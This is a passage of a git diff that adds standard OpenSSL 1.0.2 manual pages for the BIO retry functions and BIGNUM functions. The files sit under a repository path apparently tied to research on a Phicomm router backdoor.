+ #define BIO_should_read(a)		((a)->flags & BIO_FLAGS_READ)
+ #define BIO_should_write(a)		((a)->flags & BIO_FLAGS_WRITE)
+ #define BIO_should_io_special(a)	((a)->flags & BIO_FLAGS_IO_SPECIAL)
+ #define BIO_retry_type(a)		((a)->flags & BIO_FLAGS_RWS)
+ #define BIO_should_retry(a)		((a)->flags & BIO_FLAGS_SHOULD_RETRY)
+
+ #define BIO_FLAGS_READ		0x01
+ #define BIO_FLAGS_WRITE	0x02
+ #define BIO_FLAGS_IO_SPECIAL	0x04
+ #define BIO_FLAGS_RWS (BIO_FLAGS_READ|BIO_FLAGS_WRITE|BIO_FLAGS_IO_SPECIAL)
+ #define BIO_FLAGS_SHOULD_RETRY	0x08
+
+ BIO *	BIO_get_retry_BIO(BIO *bio, int *reason);
+ int	BIO_get_retry_reason(BIO *bio);
+
+=head1 DESCRIPTION
+
+These functions determine why a BIO is not able to read or write data.
+They will typically be called after a failed BIO_read() or BIO_write()
+call.
+
+BIO_should_retry() is true if the call that produced this condition
+should then be retried at a later time.
+
+If BIO_should_retry() is false then the cause is an error condition.
+
+BIO_should_read() is true if the cause of the condition is that a BIO
+needs to read data.
+
+BIO_should_write() is true if the cause of the condition is that a BIO
+needs to read data.
+
+BIO_should_io_special() is true if some "special" condition, that is a
+reason other than reading or writing is the cause of the condition.
+
+BIO_retry_type() returns a mask of the cause of a retry condition
+consisting of the values B<BIO_FLAGS_READ>, B<BIO_FLAGS_WRITE>,
+B<BIO_FLAGS_IO_SPECIAL> though current BIO types will only set one of
+these.
+
+BIO_get_retry_BIO() determines the precise reason for the special
+condition, it returns the BIO that caused this condition and if 
+B<reason> is not NULL it contains the reason code. The meaning of
+the reason code and the action that should be taken depends on
+the type of BIO that resulted in this condition.
+
+BIO_get_retry_reason() returns the reason for a special condition if
+passed the relevant BIO, for example as returned by BIO_get_retry_BIO().
+
+=head1 NOTES
+
+If BIO_should_retry() returns false then the precise "error condition"
+depends on the BIO type that caused it and the return code of the BIO
+operation. For example if a call to BIO_read() on a socket BIO returns
+0 and BIO_should_retry() is false then the cause will be that the
+connection closed. A similar condition on a file BIO will mean that it
+has reached EOF. Some BIO types may place additional information on
+the error queue. For more details see the individual BIO type manual
+pages.
+
+If the underlying I/O structure is in a blocking mode almost all current
+BIO types will not request a retry, because the underlying I/O
+calls will not. If the application knows that the BIO type will never
+signal a retry then it need not call BIO_should_retry() after a failed
+BIO I/O call. This is typically done with file BIOs.
+
+SSL BIOs are the only current exception to this rule: they can request a
+retry even if the underlying I/O structure is blocking, if a handshake
+occurs during a call to BIO_read(). An application can retry the failed
+call immediately or avoid this situation by setting SSL_MODE_AUTO_RETRY
+on the underlying SSL structure.
+
+While an application may retry a failed non blocking call immediately
+this is likely to be very inefficient because the call will fail
+repeatedly until data can be processed or is available. An application
+will normally wait until the necessary condition is satisfied. How
+this is done depends on the underlying I/O structure.
+
+For example if the cause is ultimately a socket and BIO_should_read()
+is true then a call to select() may be made to wait until data is
+available and then retry the BIO operation. By combining the retry
+conditions of several non blocking BIOs in a single select() call
+it is possible to service several BIOs in a single thread, though
+the performance may be poor if SSL BIOs are present because long delays
+can occur during the initial handshake process. 
+
+It is possible for a BIO to block indefinitely if the underlying I/O
+structure cannot process or return any data. This depends on the behaviour of
+the platforms I/O functions. This is often not desirable: one solution
+is to use non blocking I/O and use a timeout on the select() (or
+equivalent) call.
+
+=head1 BUGS
+
+The OpenSSL ASN1 functions cannot gracefully deal with non blocking I/O:
+that is they cannot retry after a partial read or write. This is usually
+worked around by only passing the relevant data to ASN1 functions when
+the entire structure can be read or written.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_BLINDING_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_BLINDING_new.pod
new file mode 100644
index 0000000..06d7ea2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_BLINDING_new.pod
@@ -0,0 +1,115 @@
+=pod
+
+=head1 NAME
+
+BN_BLINDING_new, BN_BLINDING_free, BN_BLINDING_update, BN_BLINDING_convert, 
+BN_BLINDING_invert, BN_BLINDING_convert_ex, BN_BLINDING_invert_ex, 
+BN_BLINDING_get_thread_id, BN_BLINDING_set_thread_id, BN_BLINDING_thread_id, BN_BLINDING_get_flags,
+BN_BLINDING_set_flags, BN_BLINDING_create_param - blinding related BIGNUM
+functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai,
+	BIGNUM *mod);
+ void BN_BLINDING_free(BN_BLINDING *b);
+ int BN_BLINDING_update(BN_BLINDING *b,BN_CTX *ctx);
+ int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+ int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+ int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b,
+	BN_CTX *ctx);
+ int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b,
+	BN_CTX *ctx);
+ #ifndef OPENSSL_NO_DEPRECATED
+ unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *);
+ void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long);
+ #endif
+ CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *);
+ unsigned long BN_BLINDING_get_flags(const BN_BLINDING *);
+ void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long);
+ BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
+	const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
+	int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+			  const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx),
+	BN_MONT_CTX *m_ctx);
+
+=head1 DESCRIPTION
+
+BN_BLINDING_new() allocates a new B<BN_BLINDING> structure and copies
+the B<A> and B<Ai> values into the newly created B<BN_BLINDING> object.
+
+BN_BLINDING_free() frees the B<BN_BLINDING> structure.
+
+BN_BLINDING_update() updates the B<BN_BLINDING> parameters by squaring
+the B<A> and B<Ai> or, after specific number of uses and if the
+necessary parameters are set, by re-creating the blinding parameters.
+
+BN_BLINDING_convert_ex() multiplies B<n> with the blinding factor B<A>.
+If B<r> is not NULL a copy the inverse blinding factor B<Ai> will be
+returned in B<r> (this is useful if a B<RSA> object is shared among
+several threads). BN_BLINDING_invert_ex() multiplies B<n> with the
+inverse blinding factor B<Ai>. If B<r> is not NULL it will be used as
+the inverse blinding.
+
+BN_BLINDING_convert() and BN_BLINDING_invert() are wrapper
+functions for BN_BLINDING_convert_ex() and BN_BLINDING_invert_ex()
+with B<r> set to NULL.
+
+BN_BLINDING_thread_id() provides access to the B<CRYPTO_THREADID>
+object within the B<BN_BLINDING> structure. This is to help users
+provide proper locking if needed for multi-threaded use. The "thread
+id" object of a newly allocated B<BN_BLINDING> structure is
+initialised to the thread id in which BN_BLINDING_new() was called.
+
+BN_BLINDING_get_flags() returns the BN_BLINDING flags. Currently
+there are two supported flags: B<BN_BLINDING_NO_UPDATE> and
+B<BN_BLINDING_NO_RECREATE>. B<BN_BLINDING_NO_UPDATE> inhibits the
+automatic update of the B<BN_BLINDING> parameters after each use
+and B<BN_BLINDING_NO_RECREATE> inhibits the automatic re-creation
+of the B<BN_BLINDING> parameters after a fixed number of uses (currently
+32). In newly allocated B<BN_BLINDING> objects no flags are set.
+BN_BLINDING_set_flags() sets the B<BN_BLINDING> parameters flags.
+
+BN_BLINDING_create_param() creates new B<BN_BLINDING> parameters
+using the exponent B<e> and the modulus B<m>. B<bn_mod_exp> and
+B<m_ctx> can be used to pass special functions for exponentiation
+(normally BN_mod_exp_mont() and B<BN_MONT_CTX>).
+
+=head1 RETURN VALUES
+
+BN_BLINDING_new() returns the newly allocated B<BN_BLINDING> structure
+or NULL in case of an error.
+
+BN_BLINDING_update(), BN_BLINDING_convert(), BN_BLINDING_invert(),
+BN_BLINDING_convert_ex() and BN_BLINDING_invert_ex() return 1 on
+success and 0 if an error occurred.
+
+BN_BLINDING_thread_id() returns a pointer to the thread id object
+within a B<BN_BLINDING> object.
+
+BN_BLINDING_get_flags() returns the currently set B<BN_BLINDING> flags
+(a B<unsigned long> value).
+
+BN_BLINDING_create_param() returns the newly created B<BN_BLINDING> 
+parameters or NULL on error.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>
+
+=head1 HISTORY
+
+BN_BLINDING_thread_id was first introduced in OpenSSL 1.0.0, and it
+deprecates BN_BLINDING_set_thread_id and BN_BLINDING_get_thread_id.
+
+BN_BLINDING_convert_ex, BN_BLINDIND_invert_ex, BN_BLINDING_get_thread_id,
+BN_BLINDING_set_thread_id, BN_BLINDING_set_flags, BN_BLINDING_get_flags
+and BN_BLINDING_create_param were first introduced in OpenSSL 0.9.8
+
+=head1 AUTHOR
+
+Nils Larsch for the OpenSSL project (http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_new.pod
new file mode 100644
index 0000000..bbedbb1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_new.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+BN_CTX_new, BN_CTX_init, BN_CTX_free - allocate and free BN_CTX structures
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BN_CTX *BN_CTX_new(void);
+
+ void BN_CTX_free(BN_CTX *c);
+
+Deprecated:
+
+ void BN_CTX_init(BN_CTX *c);
+
+
+=head1 DESCRIPTION
+
+A B<BN_CTX> is a structure that holds B<BIGNUM> temporary variables used by
+library functions. Since dynamic memory allocation to create B<BIGNUM>s
+is rather expensive when used in conjunction with repeated subroutine
+calls, the B<BN_CTX> structure is used.
+
+BN_CTX_new() allocates and initializes a B<BN_CTX>
+structure. 
+
+BN_CTX_free() frees the components of the B<BN_CTX>, and if it was
+created by BN_CTX_new(), also the structure itself.
+If L<BN_CTX_start(3)|BN_CTX_start(3)> has been used on the B<BN_CTX>,
+L<BN_CTX_end(3)|BN_CTX_end(3)> must be called before the B<BN_CTX>
+may be freed by BN_CTX_free().
+
+BN_CTX_init() (deprecated) initializes an existing uninitialized B<BN_CTX>.
+This should not be used for new programs. Use BN_CTX_new() instead.
+
+=head1 RETURN VALUES
+
+BN_CTX_new() returns a pointer to the B<BN_CTX>. If the allocation fails,
+it returns B<NULL> and sets an error code that can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>.
+
+BN_CTX_init() and BN_CTX_free() have no return values.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_add(3)|BN_add(3)>,
+L<BN_CTX_start(3)|BN_CTX_start(3)>
+
+=head1 HISTORY
+
+BN_CTX_new() and BN_CTX_free() are available in all versions on SSLeay
+and OpenSSL. BN_CTX_init() was added in SSLeay 0.9.1b.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_start.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_start.pod
new file mode 100644
index 0000000..dfcefe1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_CTX_start.pod
@@ -0,0 +1,52 @@
+=pod
+
+=head1 NAME
+
+BN_CTX_start, BN_CTX_get, BN_CTX_end - use temporary BIGNUM variables
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ void BN_CTX_start(BN_CTX *ctx);
+
+ BIGNUM *BN_CTX_get(BN_CTX *ctx);
+
+ void BN_CTX_end(BN_CTX *ctx);
+
+=head1 DESCRIPTION
+
+These functions are used to obtain temporary B<BIGNUM> variables from
+a B<BN_CTX> (which can been created by using L<BN_CTX_new(3)|BN_CTX_new(3)>)
+in order to save the overhead of repeatedly creating and
+freeing B<BIGNUM>s in functions that are called from inside a loop.
+
+A function must call BN_CTX_start() first. Then, BN_CTX_get() may be
+called repeatedly to obtain temporary B<BIGNUM>s. All BN_CTX_get()
+calls must be made before calling any other functions that use the
+B<ctx> as an argument.
+
+Finally, BN_CTX_end() must be called before returning from the function.
+When BN_CTX_end() is called, the B<BIGNUM> pointers obtained from
+BN_CTX_get() become invalid.
+
+=head1 RETURN VALUES
+
+BN_CTX_start() and BN_CTX_end() return no values.
+
+BN_CTX_get() returns a pointer to the B<BIGNUM>, or B<NULL> on error.
+Once BN_CTX_get() has failed, the subsequent calls will return B<NULL>
+as well, so it is sufficient to check the return value of the last
+BN_CTX_get() call. In case of an error, an error code is set, which
+can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+
+=head1 SEE ALSO
+
+L<BN_CTX_new(3)|BN_CTX_new(3)>
+
+=head1 HISTORY
+
+BN_CTX_start(), BN_CTX_get() and BN_CTX_end() were added in OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add.pod
new file mode 100644
index 0000000..88c7a79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add.pod
@@ -0,0 +1,126 @@
+=pod
+
+=head1 NAME
+
+BN_add, BN_sub, BN_mul, BN_sqr, BN_div, BN_mod, BN_nnmod, BN_mod_add,
+BN_mod_sub, BN_mod_mul, BN_mod_sqr, BN_exp, BN_mod_exp, BN_gcd -
+arithmetic operations on BIGNUMs
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+
+ int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+
+ int BN_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+
+ int BN_sqr(BIGNUM *r, BIGNUM *a, BN_CTX *ctx);
+
+ int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *a, const BIGNUM *d,
+         BN_CTX *ctx);
+
+ int BN_mod(BIGNUM *rem, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+
+ int BN_nnmod(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+
+ int BN_mod_add(BIGNUM *r, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+
+ int BN_mod_sub(BIGNUM *r, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+
+ int BN_mod_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+
+ int BN_mod_sqr(BIGNUM *r, BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+
+ int BN_exp(BIGNUM *r, BIGNUM *a, BIGNUM *p, BN_CTX *ctx);
+
+ int BN_mod_exp(BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+         const BIGNUM *m, BN_CTX *ctx);
+
+ int BN_gcd(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+
+=head1 DESCRIPTION
+
+BN_add() adds I<a> and I<b> and places the result in I<r> (C<r=a+b>).
+I<r> may be the same B<BIGNUM> as I<a> or I<b>.
+
+BN_sub() subtracts I<b> from I<a> and places the result in I<r> (C<r=a-b>).
+
+BN_mul() multiplies I<a> and I<b> and places the result in I<r> (C<r=a*b>).
+I<r> may be the same B<BIGNUM> as I<a> or I<b>.
+For multiplication by powers of 2, use L<BN_lshift(3)|BN_lshift(3)>.
+
+BN_sqr() takes the square of I<a> and places the result in I<r>
+(C<r=a^2>). I<r> and I<a> may be the same B<BIGNUM>.
+This function is faster than BN_mul(r,a,a).
+
+BN_div() divides I<a> by I<d> and places the result in I<dv> and the
+remainder in I<rem> (C<dv=a/d, rem=a%d>). Either of I<dv> and I<rem> may
+be B<NULL>, in which case the respective value is not returned.
+The result is rounded towards zero; thus if I<a> is negative, the
+remainder will be zero or negative.
+For division by powers of 2, use BN_rshift(3).
+
+BN_mod() corresponds to BN_div() with I<dv> set to B<NULL>.
+
+BN_nnmod() reduces I<a> modulo I<m> and places the non-negative
+remainder in I<r>.
+
+BN_mod_add() adds I<a> to I<b> modulo I<m> and places the non-negative
+result in I<r>.
+
+BN_mod_sub() subtracts I<b> from I<a> modulo I<m> and places the
+non-negative result in I<r>.
+
+BN_mod_mul() multiplies I<a> by I<b> and finds the non-negative
+remainder respective to modulus I<m> (C<r=(a*b) mod m>). I<r> may be
+the same B<BIGNUM> as I<a> or I<b>. For more efficient algorithms for
+repeated computations using the same modulus, see
+L<BN_mod_mul_montgomery(3)|BN_mod_mul_montgomery(3)> and
+L<BN_mod_mul_reciprocal(3)|BN_mod_mul_reciprocal(3)>.
+
+BN_mod_sqr() takes the square of I<a> modulo B<m> and places the
+result in I<r>.
+
+BN_exp() raises I<a> to the I<p>-th power and places the result in I<r>
+(C<r=a^p>). This function is faster than repeated applications of
+BN_mul().
+
+BN_mod_exp() computes I<a> to the I<p>-th power modulo I<m> (C<r=a^p %
+m>). This function uses less time and space than BN_exp().
+
+BN_gcd() computes the greatest common divisor of I<a> and I<b> and
+places the result in I<r>. I<r> may be the same B<BIGNUM> as I<a> or
+I<b>.
+
+For all functions, I<ctx> is a previously allocated B<BN_CTX> used for
+temporary variables; see L<BN_CTX_new(3)|BN_CTX_new(3)>.
+
+Unless noted otherwise, the result B<BIGNUM> must be different from
+the arguments.
+
+=head1 RETURN VALUES
+
+For all functions, 1 is returned for success, 0 on error. The return
+value should always be checked (e.g., C<if (!BN_add(r,a,b)) goto err;>).
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_CTX_new(3)|BN_CTX_new(3)>,
+L<BN_add_word(3)|BN_add_word(3)>, L<BN_set_bit(3)|BN_set_bit(3)>
+
+=head1 HISTORY
+
+BN_add(), BN_sub(), BN_sqr(), BN_div(), BN_mod(), BN_mod_mul(),
+BN_mod_exp() and BN_gcd() are available in all versions of SSLeay and
+OpenSSL. The I<ctx> argument to BN_mul() was added in SSLeay
+0.9.1b. BN_exp() appeared in SSLeay 0.9.0.
+BN_nnmod(), BN_mod_add(), BN_mod_sub(), and BN_mod_sqr() were added in
+OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add_word.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add_word.pod
new file mode 100644
index 0000000..70667d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_add_word.pod
@@ -0,0 +1,61 @@
+=pod
+
+=head1 NAME
+
+BN_add_word, BN_sub_word, BN_mul_word, BN_div_word, BN_mod_word - arithmetic
+functions on BIGNUMs with integers
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_add_word(BIGNUM *a, BN_ULONG w);
+
+ int BN_sub_word(BIGNUM *a, BN_ULONG w);
+
+ int BN_mul_word(BIGNUM *a, BN_ULONG w);
+
+ BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w);
+
+ BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w);
+
+=head1 DESCRIPTION
+
+These functions perform arithmetic operations on BIGNUMs with unsigned
+integers. They are much more efficient than the normal BIGNUM
+arithmetic operations.
+
+BN_add_word() adds B<w> to B<a> (C<a+=w>).
+
+BN_sub_word() subtracts B<w> from B<a> (C<a-=w>).
+
+BN_mul_word() multiplies B<a> and B<w> (C<a*=w>).
+
+BN_div_word() divides B<a> by B<w> (C<a/=w>) and returns the remainder.
+
+BN_mod_word() returns the remainder of B<a> divided by B<w> (C<a%w>).
+
+For BN_div_word() and BN_mod_word(), B<w> must not be 0.
+
+=head1 RETURN VALUES
+
+BN_add_word(), BN_sub_word() and BN_mul_word() return 1 for success, 0
+on error. The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+BN_mod_word() and BN_div_word() return B<a>%B<w> on success and
+B<(BN_ULONG)-1> if an error occurred.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_add(3)|BN_add(3)>
+
+=head1 HISTORY
+
+BN_add_word() and BN_mod_word() are available in all versions of
+SSLeay and OpenSSL. BN_div_word() was added in SSLeay 0.8, and
+BN_sub_word() and BN_mul_word() in SSLeay 0.9.0.
+
+Before 0.9.8a the return value for BN_div_word() and BN_mod_word()
+in case of an error was 0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_bn2bin.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_bn2bin.pod
new file mode 100644
index 0000000..a4b17ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_bn2bin.pod
@@ -0,0 +1,95 @@
+=pod
+
+=head1 NAME
+
+BN_bn2bin, BN_bin2bn, BN_bn2hex, BN_bn2dec, BN_hex2bn, BN_dec2bn,
+BN_print, BN_print_fp, BN_bn2mpi, BN_mpi2bn - format conversions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_bn2bin(const BIGNUM *a, unsigned char *to);
+ BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
+
+ char *BN_bn2hex(const BIGNUM *a);
+ char *BN_bn2dec(const BIGNUM *a);
+ int BN_hex2bn(BIGNUM **a, const char *str);
+ int BN_dec2bn(BIGNUM **a, const char *str);
+
+ int BN_print(BIO *fp, const BIGNUM *a);
+ int BN_print_fp(FILE *fp, const BIGNUM *a);
+
+ int BN_bn2mpi(const BIGNUM *a, unsigned char *to);
+ BIGNUM *BN_mpi2bn(unsigned char *s, int len, BIGNUM *ret);
+
+=head1 DESCRIPTION
+
+BN_bn2bin() converts the absolute value of B<a> into big-endian form
+and stores it at B<to>. B<to> must point to BN_num_bytes(B<a>) bytes of
+memory.
+
+BN_bin2bn() converts the positive integer in big-endian form of length
+B<len> at B<s> into a B<BIGNUM> and places it in B<ret>. If B<ret> is
+NULL, a new B<BIGNUM> is created.
+
+BN_bn2hex() and BN_bn2dec() return printable strings containing the
+hexadecimal and decimal encoding of B<a> respectively. For negative
+numbers, the string is prefaced with a leading '-'. The string must be
+freed later using OPENSSL_free().
+
+BN_hex2bn() converts the string B<str> containing a hexadecimal number
+to a B<BIGNUM> and stores it in **B<bn>. If *B<bn> is NULL, a new
+B<BIGNUM> is created. If B<bn> is NULL, it only computes the number's
+length in hexadecimal digits. If the string starts with '-', the
+number is negative. BN_dec2bn() is the same using the decimal system.
+
+BN_print() and BN_print_fp() write the hexadecimal encoding of B<a>,
+with a leading '-' for negative numbers, to the B<BIO> or B<FILE>
+B<fp>.
+
+BN_bn2mpi() and BN_mpi2bn() convert B<BIGNUM>s from and to a format
+that consists of the number's length in bytes represented as a 4-byte
+big-endian number, and the number itself in big-endian format, where
+the most significant bit signals a negative number (the representation
+of numbers with the MSB set is prefixed with null byte).
+
+BN_bn2mpi() stores the representation of B<a> at B<to>, where B<to>
+must be large enough to hold the result. The size can be determined by
+calling BN_bn2mpi(B<a>, NULL).
+
+BN_mpi2bn() converts the B<len> bytes long representation at B<s> to
+a B<BIGNUM> and stores it at B<ret>, or in a newly allocated B<BIGNUM>
+if B<ret> is NULL.
+
+=head1 RETURN VALUES
+
+BN_bn2bin() returns the length of the big-endian number placed at B<to>.
+BN_bin2bn() returns the B<BIGNUM>, NULL on error.
+
+BN_bn2hex() and BN_bn2dec() return a null-terminated string, or NULL
+on error. BN_hex2bn() and BN_dec2bn() return the number's length in
+hexadecimal or decimal digits, and 0 on error.
+
+BN_print_fp() and BN_print() return 1 on success, 0 on write errors.
+
+BN_bn2mpi() returns the length of the representation. BN_mpi2bn()
+returns the B<BIGNUM>, and NULL on error.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_zero(3)|BN_zero(3)>,
+L<ASN1_INTEGER_to_BN(3)|ASN1_INTEGER_to_BN(3)>,
+L<BN_num_bytes(3)|BN_num_bytes(3)>
+
+=head1 HISTORY
+
+BN_bn2bin(), BN_bin2bn(), BN_print_fp() and BN_print() are available
+in all versions of SSLeay and OpenSSL.
+
+BN_bn2hex(), BN_bn2dec(), BN_hex2bn(), BN_dec2bn(), BN_bn2mpi() and
+BN_mpi2bn() were added in SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_cmp.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_cmp.pod
new file mode 100644
index 0000000..23e9ed0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_cmp.pod
@@ -0,0 +1,48 @@
+=pod
+
+=head1 NAME
+
+BN_cmp, BN_ucmp, BN_is_zero, BN_is_one, BN_is_word, BN_is_odd - BIGNUM comparison and test functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_cmp(BIGNUM *a, BIGNUM *b);
+ int BN_ucmp(BIGNUM *a, BIGNUM *b);
+
+ int BN_is_zero(BIGNUM *a);
+ int BN_is_one(BIGNUM *a);
+ int BN_is_word(BIGNUM *a, BN_ULONG w);
+ int BN_is_odd(BIGNUM *a);
+
+=head1 DESCRIPTION
+
+BN_cmp() compares the numbers B<a> and B<b>. BN_ucmp() compares their
+absolute values.
+
+BN_is_zero(), BN_is_one() and BN_is_word() test if B<a> equals 0, 1,
+or B<w> respectively. BN_is_odd() tests if a is odd.
+
+BN_is_zero(), BN_is_one(), BN_is_word() and BN_is_odd() are macros.
+
+=head1 RETURN VALUES
+
+BN_cmp() returns -1 if B<a> E<lt> B<b>, 0 if B<a> == B<b> and 1 if
+B<a> E<gt> B<b>. BN_ucmp() is the same using the absolute values
+of B<a> and B<b>.
+
+BN_is_zero(), BN_is_one() BN_is_word() and BN_is_odd() return 1 if
+the condition is true, 0 otherwise.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>
+
+=head1 HISTORY
+
+BN_cmp(), BN_ucmp(), BN_is_zero(), BN_is_one() and BN_is_word() are
+available in all versions of SSLeay and OpenSSL.
+BN_is_odd() was added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_copy.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_copy.pod
new file mode 100644
index 0000000..388dd7d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_copy.pod
@@ -0,0 +1,34 @@
+=pod
+
+=head1 NAME
+
+BN_copy, BN_dup - copy BIGNUMs
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BIGNUM *BN_copy(BIGNUM *to, const BIGNUM *from);
+
+ BIGNUM *BN_dup(const BIGNUM *from);
+
+=head1 DESCRIPTION
+
+BN_copy() copies B<from> to B<to>. BN_dup() creates a new B<BIGNUM>
+containing the value B<from>.
+
+=head1 RETURN VALUES
+
+BN_copy() returns B<to> on success, NULL on error. BN_dup() returns
+the new B<BIGNUM>, and NULL on error. The error codes can be obtained
+by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+BN_copy() and BN_dup() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_generate_prime.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_generate_prime.pod
new file mode 100644
index 0000000..bf1b530
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_generate_prime.pod
@@ -0,0 +1,150 @@
+=pod
+
+=head1 NAME
+
+BN_generate_prime_ex, BN_is_prime_ex, BN_is_prime_fasttest_ex, BN_GENCB_call,
+BN_GENCB_set_old, BN_GENCB_set, BN_generate_prime, BN_is_prime,
+BN_is_prime_fasttest - generate primes and test for primality
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_generate_prime_ex(BIGNUM *ret,int bits,int safe, const BIGNUM *add,
+     const BIGNUM *rem, BN_GENCB *cb);
+
+ int BN_is_prime_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx, BN_GENCB *cb);
+
+ int BN_is_prime_fasttest_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx,
+     int do_trial_division, BN_GENCB *cb);
+
